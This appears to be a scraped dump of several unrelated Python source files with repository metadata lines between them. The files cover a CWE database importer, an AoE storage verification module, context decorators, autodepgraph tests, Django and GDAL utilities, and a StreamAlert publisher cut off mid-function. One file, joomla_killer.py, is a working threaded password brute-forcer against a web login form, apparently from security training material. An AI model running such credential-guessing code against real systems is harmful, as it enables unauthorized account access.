from lib.Config import Configuration
import lib.DatabaseLayer as db
argparser = argparse.ArgumentParser(description='populate/update NIST CWE Common Weakness Enumeration database')
argparser.add_argument('-v', action='store_true', help='verbose output')
args = argparser.parse_args()
class CWEHandler(ContentHandler):
def __init__(self):
self.cwe = []
self.description_summary_tag = False
self.weakness_tag = False
def startElement(self, name, attrs):
if name == 'Weakness':
self.weakness_tag = True
self.statement = ""
self.weaknessabs = attrs.get('Weakness_Abstraction')
self.name = attrs.get('Name')
self.idname = attrs.get('ID')
self.status = attrs.get('Status')
self.cwe.append({'name': self.name, 'id': self.idname, 'status': self.status, 'weaknessabs': self.weaknessabs})
elif name == 'Description_Summary' and self.weakness_tag:
self.description_summary_tag = True
self.description_summary = ""
def characters(self, ch):
if self.description_summary_tag:
self.description_summary += ch.replace(" ", "")
def endElement(self, name):
if name == 'Description_Summary' and self.weakness_tag:
self.description_summary_tag = False
self.cwe[-1]['description_summary'] = self.description_summary.replace("\n", "")
elif name == 'Weakness':
self.weakness_tag = False
# make parser
parser = make_parser()
ch = CWEHandler()
parser.setContentHandler(ch)
# check modification date
try:
(f, r) = Configuration.getFeedData('cwe')
except Exception as e:
print(e)
sys.exit("Cannot open url %s. Bad URL or not connected to the internet?"%(Configuration.getFeedURL("cwe")))
lastmodified = parse_datetime(r.headers['last-modified'], ignoretz=True)
i = db.getLastModified('cwe')
if i is not None:
if lastmodified == i:
print("Not modified")
sys.exit(0)
# parse xml and store in database
parser.parse(f)
cweList=[]
for cwe in progressbar(ch.cwe):
cwe['description_summary']=cwe['description_summary'].replace("\t\t\t\t\t", " ")
if args.v:
print (cwe)
cweList.append(cwe)
db.bulkUpdate('cwe', cweList)
#update database info after successful program-run
db.setColUpdate('cwe', lastmodified)
|
gpl-3.0
| 4,526,201,600,850,099,700
| 34.711538
| 123
| 0.686322
| false
| 3.571154
| false
| false
| false
|
mennis/oTTo
|
src/otto/lib/ethdrv.py
|
1
|
8288
|
from otto.lib.compute import average, standard_dev
from otto.lib.otypes import ReturnCode
from otto.lib.solaris import release_parse
from otto.utils import timefmt
def cmp_aoestat_devices(a, d):
# if a.device != d.device or a.size != d.size:
if a.size != d.size:
return ReturnCode(False, 'aoestat %s does not match device %s' % (a, d))
return ReturnCode(True)
def cmp_aoestat_targets(a, t):
# Confirm aoestats.paths in targets.ea
for l in a.port:
for m in a.paths[l].address:
found = False
for n in t:
mask = bin(n.ports)[2:][::-1]
if a.paths[l].port < len(mask) and mask[a.paths[l].port] == '1' and m == n.ea:
found = True
if not found:
return ReturnCode(False, 'aoestat %s does not match targets %s' % (a, t))
# Confirm targets.ea in aoestats.paths
for l in t:
mask = bin(l.ports)[2:][::-1]
for m in range(len(mask)):
if mask[m] == '1':
if l.ea not in a.paths[m].address:
return ReturnCode(False, 'targets %s does not match aoestat %s' % (t, a))
return ReturnCode(True)
def cmp_acbs_ca(a, c):
if a.index != c.index or a.wnd != c.wnd:
return ReturnCode(False, 'acbs %s does not match ca %s' % (a, c))
return ReturnCode(True)
def cmp_hba_ports(h, p):
checks = (h['port'] != str(p.index),
h['mac'] != p.ea,
h['type'] != p.name,
h['link']['max'] != str(p.maxlink),
h['link']['speed'] != str(p.currentlink))
if True in checks:
return ReturnCode(False, 'hba %s does not match ports %s' % (h, p))
return ReturnCode(True)
def cmp_hba_ifstats(h, i):
if h['port'] != str(i.port) or h['type'] != i.model or h['link']['speed'] != str(i.link):
return ReturnCode(False, 'hba %s does not match ifstats %s' % (h, i))
return ReturnCode(True)
def cmp_ports_ifstats(p, i):
if p.index != i.port or p.name != i.model or p.currentlink != i.link:
return ReturnCode(False, 'ports %s does not match ifstats %s' % (p, i))
return ReturnCode(True)
def verify_local(initiator):
aoestat = initiator.aoestat
acbs = initiator.ethdrv.acbs
ca = initiator.ethdrv.ca
cfg = initiator.ethdrv.config
devices = initiator.ethdrv.devices
targets = initiator.ethdrv.targets
for i in aoestat:
if i not in acbs:
return ReturnCode(False, 'aoestat %s not in acbs:\n%s' % (i, initiator.ethdrv.acbs))
if i not in ca:
return ReturnCode(False, 'aoestat %s not in ca' % i)
if i not in cfg:
return ReturnCode(False, 'aoestat %s not in config' % i)
if i in devices:
n = cmp_aoestat_devices(aoestat[i], devices[i])
if not n:
return n
else:
return ReturnCode(False, 'aoestat %s not in devices' % i)
if i in targets:
n = cmp_aoestat_targets(aoestat[i], targets[i])
if not n:
return n
else:
return ReturnCode(False, 'aoestat %s not in targets' % i)
for i in acbs:
if i not in aoestat:
return ReturnCode(False, 'acbs %s not in aoestat' % i)
if i in ca:
n = cmp_acbs_ca(acbs[i], ca[i])
if not n:
return n
else:
return ReturnCode(False, 'acbs %s not in aoestat' % i)
if i not in cfg:
return ReturnCode(False, 'acbs %s not in config' % i)
if i not in devices:
return ReturnCode(False, 'acbs %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'acbs %s not in targets' % i)
for i in ca:
if i not in aoestat:
return ReturnCode(False, 'ca %s not in aoestat' % i)
if i in acbs:
n = cmp_acbs_ca(acbs[i], ca[i])
if not n:
return n
else:
return ReturnCode(False, 'ca %s not in acbs' % i)
if i not in cfg:
return ReturnCode(False, 'ca %s not in config' % i)
if i not in devices:
return ReturnCode(False, 'ca %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'ca %s not in targets' % i)
for i in cfg:
if i not in aoestat:
return ReturnCode(False, 'config %s not in aoestat' % i)
if i not in acbs:
return ReturnCode(False, 'config %s not in acbs' % i)
if i not in ca:
return ReturnCode(False, 'config %s not in ca' % i)
if i not in devices:
return ReturnCode(False, 'config %s not in devices' % i)
if i not in targets:
return ReturnCode(False, 'config %s not in targets' % i)
for i in devices:
if i in aoestat:
n = cmp_aoestat_devices(aoestat[i], devices[i])
if not n:
return n
else:
return ReturnCode(False, 'devices %s not in aoestat' % i)
if i not in acbs:
return ReturnCode(False, 'devices %s not in acbs' % i)
if i not in ca:
return ReturnCode(False, 'devices %s not in ca' % i)
if i not in cfg:
return ReturnCode(False, 'devices %s not in config' % i)
if i not in targets:
return ReturnCode(False, 'devices %s not in targets' % i)
for i in targets:
# check for stale target
seen = False
for j in targets[i]:
if j.ports != 0:
seen = True
if not seen:
continue
if i in aoestat:
n = cmp_aoestat_targets(aoestat[i], targets[i])
if not n:
return n
else:
return ReturnCode(False, 'targets %s not in aoestat' % i)
if i not in acbs:
return ReturnCode(False, 'targets %s not in acbs' % i)
if i not in ca:
return ReturnCode(False, 'targets %s not in ca' % i)
if i not in devices:
return ReturnCode(False, 'targets %s not in devices' % i)
if i not in cfg:
return ReturnCode(False, 'targets %s not in config' % i)
hba = initiator.hba_ports
ports = initiator.ethdrv.ports
ifstats = initiator.ethdrv.ifstats
for i in hba:
if int(i) in ports:
n = cmp_hba_ports(hba[i], ports[int(i)])
if not n:
return n
else:
return ReturnCode(False, 'hba %s not in ports' % i)
if int(i) in ifstats:
n = cmp_hba_ifstats(hba[i], ifstats[int(i)])
if not n:
return n
else:
return ReturnCode(False, 'hba %s not in ifstats' % i)
for i in ports:
if str(i) in hba:
n = cmp_hba_ports(hba[str(i)], ports[i])
if not n:
return n
else:
return ReturnCode(False, 'ports %s not in hba' % i)
if i in ifstats:
n = cmp_ports_ifstats(ports[i], ifstats[i])
if not n:
return n
else:
return ReturnCode(False, 'ports %s not in ifstats' % i)
for i in ifstats:
if str(i) in hba:
n = cmp_hba_ifstats(hba[str(i)], ifstats[i])
if not n:
return n
else:
return ReturnCode(False, 'ifstats %s not in hba' % i)
if i in ports:
n = cmp_ports_ifstats(ports[i], ifstats[i])
if not n:
return n
else:
return ReturnCode(False, 'ifstats %s not in ports' % i)
v = initiator.aoeversion
r = release_parse(initiator.ethdrv.release)
if r != v:
return ReturnCode(False, 'release %s does not match version %s' % (r, v))
# just read; nothing to compare with
_ = initiator.ethdrv.corestats
_ = initiator.ethdrv.ctl
_ = initiator.ethdrv.units
_ = initiator.ethdrv.elstats
return ReturnCode(True)
def list_stats(l):
stats = '\tsamples:%s' % len(l)
stats += '\taverage:%s' % timefmt(average(l))
stats += '\tstddev:%s' % timefmt(standard_dev(l))
stats += '\tmax:%s' % max(l)
stats += '\tmin:%s' % min(l)
return stats
|
bsd-3-clause
| -7,500,629,519,187,409,000
| 33.106996
| 95
| 0.534146
| false
| 3.359546
| true
| false
| false
|
PhillsProgrammingExperiments/runtime_context
|
contexting_lib/decorators.py
|
1
|
1661
|
from contexting_lib.runtime_context import ContextDependentFunction, RuntimeContext
def default(foo):
runtime_context = RuntimeContext()
def_p_ctx = runtime_context.default_process_context
def_t_ctx = runtime_context.default_thread_context
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[def_p_ctx] \
[def_t_ctx] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
def thread_bound(thread_context):
def decorator(foo):
runtime_context = RuntimeContext()
def_p_ctx = runtime_context.default_process_context
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[def_p_ctx] \
[thread_context] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
return decorator
def process_bound(process_context):
def decorator(foo):
runtime_context = RuntimeContext()
def_t_ctx = runtime_context.default_thread_context
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[process_context] \
[def_t_ctx] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
return decorator
def context_bound(process_context, thread_context):
def decorator(foo):
runtime_context = RuntimeContext()
runtime_context._contexts_to_foo_mapping \
[foo.__qualname__] \
[process_context] \
[thread_context] = foo
return ContextDependentFunction(foo.__name__, foo.__qualname__)
return decorator
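# Example usage (a sketch; 'worker' is a hypothetical thread context name):
#
#   @default
#   def handle(): return 'generic'
#
#   @thread_bound('worker')
#   def handle(): return 'worker-specific'
#
# Both registrations share one qualname, and the returned
# ContextDependentFunction is expected to dispatch to whichever variant
# matches the active RuntimeContext, falling back to the default.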
|
mit
| -6,346,212,727,357,678,000
| 35.130435
| 83
| 0.614088
| false
| 4.1525
| false
| false
| false
|
AdriaanRol/AutoDepGraph
|
autodepgraph/tests/test_graph.py
|
1
|
7160
|
from unittest import TestCase, expectedFailure
from autodepgraph import visualization as vis
import autodepgraph as adg
import networkx as nx
from autodepgraph.graph import AutoDepGraph_DAG
import yaml
import os
test_dir = os.path.join(adg.__path__[0], 'tests', 'test_data')
class Test_Graph(TestCase):
@classmethod
def setUpClass(self):
cal_True_delayed = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_True_delayed')
test_graph = AutoDepGraph_DAG('test graph')
for node in ['A', 'B', 'C', 'D', 'E']:
test_graph.add_node(node, calibrate_function=cal_True_delayed)
test_graph.add_edge('C', 'A')
test_graph.add_edge('C', 'B')
test_graph.add_edge('B', 'A')
test_graph.add_edge('D', 'A')
test_graph.add_edge('E', 'D')
self.test_graph = test_graph
def test_default_not_implemented_cal(self):
test_graph = AutoDepGraph_DAG('test graph')
test_graph.add_node('A')
self.assertEqual(test_graph.nodes()['A']['state'], 'unknown')
with self.assertRaises(ValueError):
test_graph.maintain_node('A')
self.assertEqual(test_graph.nodes()['A']['state'], 'bad')
with self.assertRaises(ValueError):
test_graph.maintain_A()
def test_tolerance_check(self):
# The default check returns 1.0
self.test_graph.nodes['A']['tolerance'] = 0
self.assertEqual(self.test_graph.check_node('A'), 'needs calibration')
self.test_graph.nodes['A']['tolerance'] = 2
self.assertEqual(self.test_graph.check_node('A'), 'good')
self.test_graph.nodes['A']['tolerance'] = 0
self.assertEqual(self.test_graph.check_node('A'), 'needs calibration')
def test_maintain_node_assume_unkown_is_good(self):
self.test_graph.set_all_node_states(
'unknown')
self.test_graph.maintain_node('C')
self.assertEqual(self.test_graph.nodes()['C']['state'], 'good')
self.assertEqual(self.test_graph.nodes()['B']['state'], 'unknown')
def test_calibration_state(self):
s = self.test_graph.calibration_state()
self.assertIsInstance(s, dict)
def test_set_function(self):
self.test_graph.set_node_attribute('A', 'myattribute', 10)
self.assertEqual(self.test_graph.get_node_attribute('A', 'myattribute'), 10)
self.test_graph.set_node_description('A', 'explain node A')
self.assertEqual(self.test_graph.get_node_attribute('A', 'description'), 'explain node A')
def test_maintain_node_require_cal(self):
self.test_graph.set_all_node_states(
'needs calibration')
self.test_graph.maintain_node('C')
self.assertEqual(self.test_graph.nodes()['C']['state'], 'good')
self.assertEqual(self.test_graph.nodes()['B']['state'], 'good')
self.assertEqual(self.test_graph.nodes()['D']['state'],
'needs calibration')
def test_bad_node(self):
cal_True_delayed = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_True_delayed')
test_graph = AutoDepGraph_DAG('test graph')
for node in ['A', 'B', 'C', 'D', 'E']:
test_graph.add_node(node, calibrate_function=cal_True_delayed)
test_graph.add_edge('C', 'A')
test_graph.add_edge('C', 'B')
test_graph.add_edge('B', 'A')
test_graph.add_edge('D', 'A')
test_graph.add_edge('E', 'D')
test_graph.set_all_node_states('unknown')
self.assertEqual(test_graph.nodes()['C']['state'], 'unknown')
self.assertEqual(test_graph.nodes()['B']['state'], 'unknown')
self.assertEqual(test_graph.nodes()['A']['state'], 'unknown')
cal_False = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_False')
test_graph.nodes['C']['calibrate_function'] = cal_False
# Failure to calibrate should raise an error
with self.assertRaises(ValueError):
test_graph.maintain_node('C')
# In the process of trying to fix node C it should try to
# calibrate its requirements
self.assertEqual(test_graph.nodes()['C']['state'], 'bad')
self.assertEqual(test_graph.nodes()['B']['state'], 'good')
self.assertEqual(test_graph.nodes()['A']['state'], 'good')
cal_True_delayed = ('autodepgraph.node_functions.calibration_functions'
'.test_calibration_True_delayed')
def test_plotting_mpl(self):
self.test_graph.draw_mpl()
self.test_graph.cfg_plot_mode = 'matplotlib'
self.test_graph.update_monitor()
# call twice to have both creation and update of plot
self.test_graph.update_monitor()
def test_plotting_svg(self):
self.test_graph.draw_svg()
self.test_graph.cfg_plot_mode = 'svg'
self.test_graph.update_monitor()
# call twice to have both creation and update of plot
self.test_graph.update_monitor()
def test_dummy_cal_three_qubit_graph(self):
fn = os.path.join(test_dir, 'three_qubit_graph.yaml')
DAG = nx.readwrite.read_yaml(fn)
DAG.set_all_node_states('needs calibration')
DAG.cfg_plot_mode = None
DAG.maintain_node('Chevron q0-q1')
self.assertEqual(DAG.get_node_state('Chevron q0-q1'), 'good')
self.assertEqual(DAG.get_node_state('CZ q0-q1'), 'needs calibration')
def test_write_read_yaml(self):
"""
Mostly an example on how to read and write, but also test for
weird objects being present.
"""
self.test_graph.nodes()['C']['state'] = 'good'
self.test_graph.nodes()['B']['state'] = 'unknown'
fn = os.path.join(test_dir, 'nx_test_graph.yaml')
nx.readwrite.write_yaml(self.test_graph, fn)
read_testgraph = nx.readwrite.read_yaml(fn)
self.assertTrue(isinstance(read_testgraph, AutoDepGraph_DAG))
self.assertEqual(read_testgraph.nodes()['C']['state'], 'good')
self.assertEqual(read_testgraph.nodes()['B']['state'], 'unknown')
def test_adding_edge_nonexistent_node(self):
test_graph = AutoDepGraph_DAG('test graph')
test_graph.add_node('A')
with self.assertRaises(KeyError):
test_graph.add_edge('A', 'B')
with self.assertRaises(KeyError):
test_graph.add_edge('B', 'A')
# def propagate_error(self, state):
# '''
# Sets the state of this node to 'state' and calls this method for all
# child nodes (nodes that depend on this node). Used for recursively
# propagate errors.
# '''
# self.state(state)
# for child_name in self.children():
# # This will result in a depth-first search through the graph
# # that is quite inefficient and can visit many nodes multiple
# # times. We don't really care though, since the graph shouldn't
# # larger than ~100 nodes.
# self.find_instrument(child_name).propagate_error(state)
|
mit
| 1,161,567,346,362,417,000
| 40.627907
| 98
| 0.609358
| false
| 3.654926
| true
| false
| false
|
crateio/crate.web
|
crate/web/dashboard/modules.py
|
2
|
1435
|
import collections
import datetime
import redis
from django.conf import settings
from django.utils.timezone import utc
from admin_tools.dashboard.modules import DashboardModule
class StatusModule(DashboardModule):
title = "Status"
template = "admin_tools/dashboard/modules/status.html"
def init_with_context(self, context):
if hasattr(settings, "PYPI_DATASTORE"):
datastore = redis.StrictRedis(**dict([(x.lower(), y) for x, y in settings.REDIS[settings.PYPI_DATASTORE].items()]))
if datastore.get("crate:pypi:since") is not None:
self.last_sync = datetime.datetime.fromtimestamp(float(datastore.get("crate:pypi:since")))
self.last_sync.replace(tzinfo=utc)
else:
self.last_sync = None
self.celery_queue_length = datastore.llen("celery")
def is_empty(self):
return False
class RedisStatusModule(DashboardModule):
title = "Redis Status"
template = "admin_tools/dashboard/modules/redis.html"
def init_with_context(self, context):
if hasattr(settings, "PYPI_DATASTORE"):
datastore = redis.StrictRedis(**dict([(x.lower(), y) for x, y in settings.REDIS[settings.PYPI_DATASTORE].items()]))
self.redis_info = collections.OrderedDict(sorted([(k, v) for k, v in datastore.info().iteritems()], key=lambda x: x[0]))
def is_empty(self):
return False
|
bsd-2-clause
| 6,472,937,229,180,296,000
| 31.613636
| 132
| 0.661324
| false
| 3.857527
| false
| false
| false
|
zillians/supercell
|
scripts/set_xml.py
|
1
|
1678
|
#!/usr/bin/env python
from xml.dom.minidom import parse, parseString
import getopt
import sys
class DomHandler():
def __init__(self, file_name):
self.dom = parse(file_name)
def setValue(self, attr_name, attr_value):
result = False
for node in self.dom.getElementsByTagName('parameter'):
if node.getAttribute('name') == attr_name:
""" parameter name is equal to attr_name """
print "find attribute name: %s" % (attr_name)
result = True
if node.getAttribute('value') == attr_value:
continue
else:
node.setAttribute('value', attr_value)
print "set attribute value: %s" % (attr_value)
return result
def save(self, file_name):
f = open(file_name, 'w')
f.write(self.dom.toxml())
f.close()
def main():
if len(sys.argv) < 4:
usage()
sys.exit(2)
fileName = sys.argv[1]
attrName = sys.argv[2]
attrValue = sys.argv[3]
simpleDom = DomHandler(fileName)
result = simpleDom.setValue(attrName, attrValue)
if not result:
print "set attribute fail"
else:
simpleDom.save(fileName)
def usage():
print "usage: %s [file] [name] [value]" % (__file__)
print\
"""
[file] xml file
[name] attribute name
[value] value to set to that attribute
"""
def test():
dom1 = parse( "/nfs/home/zac/zillians/lib/node/world-server/WorldServerModule.module" ) # parse an XML file
dom2 = parseString( "<myxml>Some data <empty/> some more data</myxml>" )
print dom1.toxml()
#print dom2.toxml()
for node in dom1.getElementsByTagName('parameter'): # visit every node <bar />
if node.getAttribute("name") == "local_id":
print "node attribute value: %s" % (node.getAttribute("value"))
if __name__ == "__main__":
main()
|
agpl-3.0
| 1,887,179,124,444,890,400
| 24.815385
| 110
| 0.662694
| false
| 2.913194
| false
| false
| false
|
ablil98/python
|
bhp/joomla_killer.py
|
1
|
3126
|
#!/usr/bin/env python3
import threading
import queue
import http.cookiejar
import urllib.request
import urllib.parse
import time
import pdb
from html.parser import HTMLParser
# general variables
threads = 1
username = 'admin'
wordlist_file = 'passwords.lst'
resume = None # password to resume from
# target variables
target_url = 'http://localhost/dvwa/login.php'
target_post = 'http://localhost/dvwa/login.php'
# form variables
username_field = 'username'
password_field = 'password'
class BruteParser(HTMLParser):
"""get form field"""
def __init__(self):
super(BruteParser, self).__init__()
self.tag_results = dict()
def handle_starttag(self, tag, attrs):
if tag == 'input':
tag_name = None
tag_value = None
for name, value in attrs :
if name == 'name':
tag_name = value
if name == 'value':
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = tag_value
class Bruter():
def __init__(self, username, words):
self.username = username
self.passwords_q = words
self.found = False # Set to True if we found the password
print("[+] Finished setting up for {} ".format(self.username))
def run_bruteforce(self):
for i in range(threads):
print("[*] Spawning thread {} ...".format(i))
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.passwords_q.empty() and not self.found:
password_try = self.passwords_q.get()
# create cookie jar
cookie_jar = http.cookiejar.FileCookieJar("cookies")
# handle cookie jar for urllib library
cookie_handler = urllib.request.HTTPCookieProcessor(cookie_jar)
# get url response
opener = urllib.request.build_opener(cookie_handler)
response = opener.open(target_url)
page = response.read()
print("[*] Trying : {} - {} ( {} left )".format(self.username, password_try, self.passwords_q.qsize()))
# parse html data
parser = BruteParser()
parser.feed(page.decode())
# set our username and password
post_tags = parser.tag_results
post_tags[username_field] = self.username
post_tags[password_field] = password_try
login_data = urllib.parse.urlencode(post_tags)
login_response = opener.open(target_post, login_data.encode())
login_result = login_response.read()
# if found the password
if 'Login failed' not in login_result.decode():
self.found = True
print("Brute Foce successffull Yeah")
print("\n[+] Username : {}".format(self.username))
print("[+] Password : {}\n".format(password_try))
print("[*] Waiting for other processes to stop ...")
def build_wordlist(wordlist_file):
wordlist_queue = queue.Queue()
with open(wordlist_file, 'r') as f:
raw_data = f.readlines()
for word in raw_data:
wordlist_queue.put(word.rstrip())
return wordlist_queue
if __name__ == '__main__':
print('[*] Reading wordlist : {} '.format(wordlist_file))
passwords_q = build_wordlist(wordlist_file)
print('[+] Finished reading wordlist successfully ({} passwords)'.format(passwords_q.qsize()))
bruteforcer = Bruter('admin', passwords_q)
bruteforcer.run_bruteforce()
|
gpl-3.0
| 1,010,688,772,363,187,200
| 24.008
| 106
| 0.680102
| false
| 3.206154
| false
| false
| false
|
slek120/phys534
|
HW4/Aw.py
|
1
|
1191
|
from scipy import *
from scipy.integrate import simps
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def Compute_Aw(om, DOS, Sig, ommesh, delta=0.1j):
Aw = zeros(len(om))
for i in range(len(om)):
DMFTW = DOS / (om[i] - Sig[i] - ommesh + delta)
Aw[i] = simps(-1.*DMFTW.imag/pi, ommesh)
return Aw
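# The integrand is the lattice Hilbert transform: G(w) = Int de D(e) /
# (w - Sigma(w) - e + i*delta), and the curve plotted below is the spectral
# function A(w) = -(1/pi) * Im G(w).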
# Load DOS
DOSfile = loadtxt('2D_SL_DOS')
# 1st column as energies
ommesh = DOSfile[:,0]
# 2nd column as DOS
DOS = DOSfile[:,1]
# Normalize
DOS = DOS / simps(DOS, ommesh)
# Load Sig
Sigfile = loadtxt('Sig.out.U6')
# 1st column as frequencies
om = Sigfile[:,0]
# 2nd, 3rd column as self energy
Sig = Sigfile[:,1] + 1j * Sigfile[:,2]
Aw = Compute_Aw(om, DOS, Sig, ommesh)
plt.plot(om, Aw)
plt.xlim(0,50)
plt.legend(['U=6'], loc='best')
plt.ylabel(r'$A(\omega)$')
plt.xlabel(r'$\omega$')
plt.savefig('Aw_U6.png')
plt.clf() # start a fresh figure so the U=6 curve is not replotted
# Load Sig
Sigfile = loadtxt('Sig.out.U12')
# 1st column as frequencies
om = Sigfile[:,0]
# 2nd, 3rd column as self energy
Sig = Sigfile[:,1] + 1j * Sigfile[:,2]
Aw = Compute_Aw(om, DOS, Sig, ommesh)
plt.plot(om, Aw)
plt.xlim(0,50)
plt.legend(['U=12'], loc='best')
plt.ylabel(r'$A(\omega)$')
plt.xlabel(r'$\omega$')
plt.savefig('Aw_U12.png')
|
gpl-3.0
| -4,123,881,550,766,441,000
| 21.903846
| 51
| 0.650714
| false
| 2.465839
| false
| false
| false
|
google/ffn
|
ffn/training/import_util.py
|
1
|
1882
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains a utility function for dynamically importing symbols from modules.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import logging
def import_symbol(specifier, default_packages='ffn.training.models'):
"""Imports a symbol from a python module.
The calling module must have the target module for the import as dependency.
Args:
specifier: full path specifier in format
[<packages>.]<module_name>.<model_class>, if packages is missing
``default_packages`` is used.
default_packages: chain of packages before module in format
<top_pack>.<sub_pack>.<subsub_pack> etc.
Returns:
symbol: object from module
"""
module_path, symbol_name = specifier.rsplit('.', 1)
try:
logging.info('Importing symbol %s from %s.%s',
symbol_name, default_packages, module_path)
module = importlib.import_module(default_packages + '.' + module_path)
except ImportError as e:
logging.info(e)
logging.info('Importing symbol %s from %s', symbol_name, module_path)
module = importlib.import_module(module_path)
symbol = getattr(module, symbol_name)
return symbol
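# Example (hypothetical module and class names):
#   model_cls = import_symbol('convstack_3d.ConvStack3DFFNModel')
#   # tries ffn.training.models.convstack_3d first, then falls back to
#   # importing 'convstack_3d' as a top-level module path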
|
apache-2.0
| 2,617,406,135,293,789,000
| 35.192308
| 80
| 0.689692
| false
| 4.248307
| false
| false
| false
|
guixing/simplecmdb
|
hostinfo/models.py
|
1
|
1100
|
from django.db import models
class Host(models.Model):
"""store host information"""
hostname = models.CharField(max_length=30)
osver = models.CharField(max_length=30)
vendor = models.CharField(max_length=30)
product = models.CharField(max_length=30)
cpu_model = models.CharField(max_length=30)
cpu_num = models.IntegerField()
memory = models.IntegerField()
sn = models.CharField(max_length=30)
ipaddr = models.IPAddressField(max_length=15)
identity = models.CharField(max_length=32)
def __unicode__(self):
return self.hostname
class HostGroup(models.Model):
name = models.CharField(max_length=30)
members = models.ManyToManyField(Host)
def __unicode__(self):
return self.name
def handle_hostsave_signal(sender, **kwargs):
new_host = kwargs['instance']
old_host = Host.objects.get(identity=new_host.identity)
if new_host.hostname != old_host.hostname:
change_hostname(new_host.ipaddr, new_host.hostname)
#models.signals.pre_save.connect(handle_hostsave_signal, sender=Host)
|
bsd-3-clause
| 6,485,501,293,390,478,000
| 32.333333
| 69
| 0.702727
| false
| 3.536977
| false
| false
| false
|
andyzsf/django
|
django/contrib/gis/gdal/driver.py
|
1
|
3257
|
from ctypes import c_void_p
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.error import OGRException
from django.contrib.gis.gdal.prototypes import ds as vcapi, raster as rcapi
from django.utils import six
from django.utils.encoding import force_bytes, force_text
class Driver(GDALBase):
"""
Wraps a GDAL/OGR Data Source Driver.
For more information, see the C API source code:
http://www.gdal.org/gdal_8h.html - http://www.gdal.org/ogr__api_8h.html
"""
# Case-insensitive aliases for some GDAL/OGR Drivers.
# For a complete list of original driver names see
# http://www.gdal.org/ogr_formats.html (vector)
# http://www.gdal.org/formats_list.html (raster)
_alias = {
# vector
'esri': 'ESRI Shapefile',
'shp': 'ESRI Shapefile',
'shape': 'ESRI Shapefile',
'tiger': 'TIGER',
'tiger/line': 'TIGER',
# raster
'tiff': 'GTiff',
'tif': 'GTiff',
'jpeg': 'JPEG',
'jpg': 'JPEG',
}
def __init__(self, dr_input):
"""
        Initializes a GDAL/OGR driver from either a string or an integer input.
"""
if isinstance(dr_input, six.string_types):
# If a string name of the driver was passed in
self.ensure_registered()
# Checking the alias dictionary (case-insensitive) to see if an
# alias exists for the given driver.
if dr_input.lower() in self._alias:
name = self._alias[dr_input.lower()]
else:
name = dr_input
# Attempting to get the GDAL/OGR driver by the string name.
for iface in (vcapi, rcapi):
driver = iface.get_driver_by_name(force_bytes(name))
if driver:
break
elif isinstance(dr_input, int):
self.ensure_registered()
for iface in (vcapi, rcapi):
driver = iface.get_driver(dr_input)
if driver:
break
elif isinstance(dr_input, c_void_p):
driver = dr_input
else:
raise OGRException('Unrecognized input type for GDAL/OGR Driver: %s' % str(type(dr_input)))
# Making sure we get a valid pointer to the OGR Driver
if not driver:
raise OGRException('Could not initialize GDAL/OGR Driver on input: %s' % str(dr_input))
self.ptr = driver
def __str__(self):
return self.name
@classmethod
def ensure_registered(cls):
"""
Attempts to register all the data source drivers.
"""
# Only register all if the driver count is 0 (or else all drivers
# will be registered over and over again)
if not cls.driver_count():
vcapi.register_all()
rcapi.register_all()
@classmethod
def driver_count(cls):
"""
Returns the number of GDAL/OGR data source drivers registered.
"""
return vcapi.get_driver_count() + rcapi.get_driver_count()
@property
def name(self):
"""
Returns description/name string for this driver.
"""
return force_text(rcapi.get_driver_description(self.ptr))
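# A minimal usage sketch (requires a working GDAL/OGR installation):
#
#   >>> from django.contrib.gis.gdal import Driver
#   >>> dr = Driver('shp')          # case-insensitive alias for 'ESRI Shapefile'
#   >>> str(dr)
#   'ESRI Shapefile'
#   >>> Driver.driver_count() > 0   # drivers were registered on first use
#   True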
|
bsd-3-clause
| 3,520,037,014,693,149,700
| 32.57732
| 103
| 0.580596
| false
| 4.025958
| false
| false
| false
|
airbnb/streamalert
|
publishers/community/generic.py
|
1
|
9345
|
"""
Copyright 2017-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import deque, OrderedDict
import re
from streamalert.shared.publisher import Register, AlertPublisher
from streamalert.shared.normalize import Normalizer
from streamalert.shared.utils import get_keys
@Register
def add_record(alert, publication):
"""Publisher that adds the alert.record to the publication."""
publication['record'] = alert.record
return publication
@Register
def blank(*_):
"""Erases all fields on existing publications and returns a blank dict"""
return {}
@Register
def remove_internal_fields(_, publication):
"""This publisher removes fields from DefaultPublisher that are only useful internally"""
publication.pop('staged', None)
publication.pop('publishers', None)
publication.pop('outputs', None)
return publication
def _delete_dictionary_fields(publication, regexp):
"""Deeply destroys all nested dict keys matching the given regexp string
Args:
publication (dict): A publication
regexp (str): A String that is valid regexp
Returns:
dict
(!) warning, will modify the original publication
"""
    # Python recursion is depth-limited, so this walks the structure iteratively
    # (BFS with a queue). It relies on dicts and lists being held by reference:
    # mutating next_item mutates the original publication, so the loop never has
    # to track the "current scope" of next_item.
fringe = deque()
fringe.append(publication)
while len(fringe) > 0:
next_item = fringe.popleft()
